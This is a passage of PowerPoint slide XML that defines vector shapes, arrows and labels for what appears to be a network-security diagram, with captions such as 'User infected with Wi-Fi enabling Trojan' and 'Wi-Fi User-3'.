                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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7" name="Freeform 2872"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3735" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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8" name="Freeform 2873"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3886" y="3390"/>
                <a:ext cx="156" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="9" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="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9" name="Freeform 2874"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3865" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39" y="1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40" name="Freeform 2875"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3865" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39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41" name="Freeform 2876"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3938" y="3898"/>
                <a:ext cx="24" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 12 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="9" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1042" name="Straight Arrow Connector 1041"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5142589" y="1676400"/>
              <a:ext cx="4592723" cy="3306722"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow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3" name="Oval 1042"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7887897" y="3626494"/>
              <a:ext cx="182880" cy="18288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44" name="Rectangle 1043"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5409264" y="1233205"/>
              <a:ext cx="2753574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User infected with Wi-Fi enabling Trojan</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1045" name="Text Box 868"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6727334" y="3729700"/>
              <a:ext cx="97174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Wi-Fi User-3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1046" name="Group 395"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6307249" y="2866656"/>
              <a:ext cx="1130300" cy="774700"/>
              <a:chOff x="1938" y="1711"/>
              <a:chExt cx="2159" cy="1479"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1047" name="Group 396"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1938" y="1711"/>
                <a:ext cx="1081" cy="1188"/>
                <a:chOff x="1938" y="1711"/>
                <a:chExt cx="1081" cy="1188"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1129" name="Freeform 397"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1938" y="1711"/>
                  <a:ext cx="1081" cy="1188"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 257 w 1280"/>
                    <a:gd name="T1" fmla="*/ 0 h 1405"/>
                    <a:gd name="T2" fmla="*/ 0 w 1280"/>
                    <a:gd name="T3" fmla="*/ 68 h 1405"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 1131 h 1405"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 1405 h 1405"/>
                    <a:gd name="T8" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T9" fmla="*/ 342 h 1405"/>
                    <a:gd name="T10" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T11" fmla="*/ 274 h 1405"/>
                    <a:gd name="T12" fmla="*/ 257 w 1280"/>
                    <a:gd name="T13" fmla="*/ 0 h 14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80" h="1405">
                      <a:moveTo>
                        <a:pt x="257" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="1405"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6C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30" name="Freeform 398"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1938" y="2582"/>
                  <a:ext cx="1081" cy="290"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 274 h 342"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 342"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 68 h 342"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 342 h 342"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 274 h 3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0" h="342">
                      <a:moveTo>
                        <a:pt x="1280" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274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Freeform 399"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1938" y="2357"/>
                  <a:ext cx="1081" cy="287"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 272 h 340"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 340"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 66 h 340"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 340 h 340"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 272 h 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0" h="340">
                      <a:moveTo>
                        <a:pt x="1280" y="272"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="66"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="340"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="272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1132" name="Group 400"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2028" y="2253"/>
                  <a:ext cx="797" cy="347"/>
                  <a:chOff x="2031" y="2241"/>
                  <a:chExt cx="797" cy="345"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1181" name="Group 401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031" y="2241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1190" name="Freeform 40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91" name="Freeform 403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92" name="Freeform 40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182" name="Group 405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301" y="2311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1187" name="Freeform 40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88" name="Freeform 407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89" name="Freeform 40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183" name="Group 409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571" y="2384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1184" name="Freeform 41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85" name="Freeform 411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86" name="Freeform 41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1133" name="Freeform 413"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1938" y="2133"/>
                  <a:ext cx="1081" cy="287"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 274 h 340"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 340"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 69 h 340"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 340 h 340"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 274 h 3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0" h="340">
                      <a:moveTo>
                        <a:pt x="1280" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="340"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274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34" name="Freeform 414"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1938" y="1906"/>
                  <a:ext cx="1081" cy="290"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 274 h 343"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 343"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 69 h 343"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 343 h 343"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 274 h 3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0" h="343">
                      <a:moveTo>
                        <a:pt x="1280" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274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1135" name="Group 415"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2028" y="2481"/>
                  <a:ext cx="797" cy="346"/>
                  <a:chOff x="2031" y="2241"/>
                  <a:chExt cx="797" cy="345"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1169" name="Group 416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031" y="2241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1178" name="Freeform 417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79" name="Freeform 41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80" name="Freeform 419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170" name="Group 42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301" y="2311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1175" name="Freeform 421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76" name="Freeform 42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77" name="Freeform 423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171" name="Group 424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571" y="2384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1172" name="Freeform 425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73" name="Freeform 42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74" name="Freeform 427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1136" name="Group 428"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2028" y="2025"/>
                  <a:ext cx="797" cy="347"/>
                  <a:chOff x="2031" y="2241"/>
                  <a:chExt cx="797" cy="345"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1157" name="Group 429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031" y="2241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1166" name="Freeform 43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67" name="Freeform 431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68" name="Freeform 43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158" name="Group 433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301" y="2311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1163" name="Freeform 43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64" name="Freeform 435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65" name="Freeform 43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159" name="Group 437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571" y="2384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1160" name="Freeform 43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61" name="Freeform 439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62" name="Freeform 44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1137" name="Group 441"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2028" y="1799"/>
                  <a:ext cx="797" cy="346"/>
                  <a:chOff x="2031" y="2241"/>
                  <a:chExt cx="797" cy="345"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1145" name="Group 442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031" y="2241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1154" name="Freeform 443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55" name="Freeform 44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56" name="Freeform 445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146" name="Group 446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301" y="2311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1151" name="Freeform 447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52" name="Freeform 44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53" name="Freeform 449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147" name="Group 45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571" y="2384"/>
                    <a:ext cx="257" cy="202"/>
                    <a:chOff x="1315" y="1508"/>
                    <a:chExt cx="596" cy="469"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="1148" name="Freeform 451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49" name="Freeform 45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50" name="Freeform 453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1138" name="Freeform 454"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2804" y="1942"/>
                  <a:ext cx="215" cy="957"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 255"/>
                    <a:gd name="T1" fmla="*/ 68 h 1131"/>
                    <a:gd name="T2" fmla="*/ 0 w 255"/>
                    <a:gd name="T3" fmla="*/ 335 h 1131"/>
                    <a:gd name="T4" fmla="*/ 0 w 255"/>
                    <a:gd name="T5" fmla="*/ 375 h 1131"/>
                    <a:gd name="T6" fmla="*/ 0 w 255"/>
                    <a:gd name="T7" fmla="*/ 564 h 1131"/>
                    <a:gd name="T8" fmla="*/ 0 w 255"/>
                    <a:gd name="T9" fmla="*/ 600 h 1131"/>
                    <a:gd name="T10" fmla="*/ 0 w 255"/>
                    <a:gd name="T11" fmla="*/ 867 h 1131"/>
                    <a:gd name="T12" fmla="*/ 0 w 255"/>
                    <a:gd name="T13" fmla="*/ 900 h 1131"/>
                    <a:gd name="T14" fmla="*/ 0 w 255"/>
                    <a:gd name="T15" fmla="*/ 1131 h 1131"/>
                    <a:gd name="T16" fmla="*/ 255 w 255"/>
                    <a:gd name="T17" fmla="*/ 1063 h 1131"/>
                    <a:gd name="T18" fmla="*/ 255 w 255"/>
                    <a:gd name="T19" fmla="*/ 831 h 1131"/>
                    <a:gd name="T20" fmla="*/ 255 w 255"/>
                    <a:gd name="T21" fmla="*/ 798 h 1131"/>
                    <a:gd name="T22" fmla="*/ 255 w 255"/>
                    <a:gd name="T23" fmla="*/ 531 h 1131"/>
                    <a:gd name="T24" fmla="*/ 255 w 255"/>
                    <a:gd name="T25" fmla="*/ 496 h 1131"/>
                    <a:gd name="T26" fmla="*/ 255 w 255"/>
                    <a:gd name="T27" fmla="*/ 307 h 1131"/>
                    <a:gd name="T28" fmla="*/ 255 w 255"/>
                    <a:gd name="T29" fmla="*/ 267 h 1131"/>
                    <a:gd name="T30" fmla="*/ 255 w 255"/>
                    <a:gd name="T31" fmla="*/ 0 h 1131"/>
                    <a:gd name="T32" fmla="*/ 0 w 255"/>
                    <a:gd name="T33" fmla="*/ 68 h 1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55" h="1131">
                      <a:moveTo>
                        <a:pt x="0" y="68"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="335"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="375"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="564"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="600"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="867"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="1063"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="831"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="798"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="531"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="496"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="307"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="828282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1139" name="Group 455"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1938" y="1768"/>
                  <a:ext cx="866" cy="1131"/>
                  <a:chOff x="1940" y="1770"/>
                  <a:chExt cx="868" cy="1132"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1141" name="Freeform 456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940" y="2446"/>
                    <a:ext cx="868" cy="456"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1025"/>
                      <a:gd name="T1" fmla="*/ 0 h 538"/>
                      <a:gd name="T2" fmla="*/ 0 w 1025"/>
                      <a:gd name="T3" fmla="*/ 264 h 538"/>
                      <a:gd name="T4" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T5" fmla="*/ 538 h 538"/>
                      <a:gd name="T6" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T7" fmla="*/ 274 h 538"/>
                      <a:gd name="T8" fmla="*/ 0 w 1025"/>
                      <a:gd name="T9" fmla="*/ 0 h 538"/>
                      <a:gd name="T10" fmla="*/ 992 w 1025"/>
                      <a:gd name="T11" fmla="*/ 496 h 538"/>
                      <a:gd name="T12" fmla="*/ 33 w 1025"/>
                      <a:gd name="T13" fmla="*/ 241 h 538"/>
                      <a:gd name="T14" fmla="*/ 33 w 1025"/>
                      <a:gd name="T15" fmla="*/ 42 h 538"/>
                      <a:gd name="T16" fmla="*/ 992 w 1025"/>
                      <a:gd name="T17" fmla="*/ 297 h 538"/>
                      <a:gd name="T18" fmla="*/ 992 w 1025"/>
                      <a:gd name="T19" fmla="*/ 297 h 538"/>
                      <a:gd name="T20" fmla="*/ 992 w 1025"/>
                      <a:gd name="T21" fmla="*/ 496 h 5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025" h="538">
